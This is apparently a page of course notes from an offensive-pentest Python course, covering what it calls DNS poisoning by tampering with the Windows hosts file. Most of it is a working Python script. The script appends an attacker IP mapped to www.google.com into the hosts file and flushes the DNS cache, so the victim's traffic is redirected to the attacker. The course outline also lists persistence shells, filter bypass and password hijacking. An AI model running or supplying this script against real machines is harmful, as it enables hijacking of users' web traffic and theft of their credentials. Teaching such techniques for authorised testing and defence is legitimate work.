DNS poisoning
From course: Python For Offensive PenTest: A Complete Practical Course.
General index of the course
- Gaining persistence shells (TCP + HTTP):
- Advanced scriptable shells:
- Techniques for bypassing filters:
- Malware and crytography:
- Password Hickjacking:
- Privilege escalation:
1. Add a new line to hosts file in windows with attacker IP and an url
2. Flush the DNS cache to make sure that we will use the updated record
Now traffic will be redirected to the attacker machine.
Python script for DNS poisoning
import subprocess
import os
os.chdir("C:\Windows\System32\drivers\etc")
command = "echo 10.10.10.100 www.google.com >> hosts"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
command = "ipconfig /flushdns"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)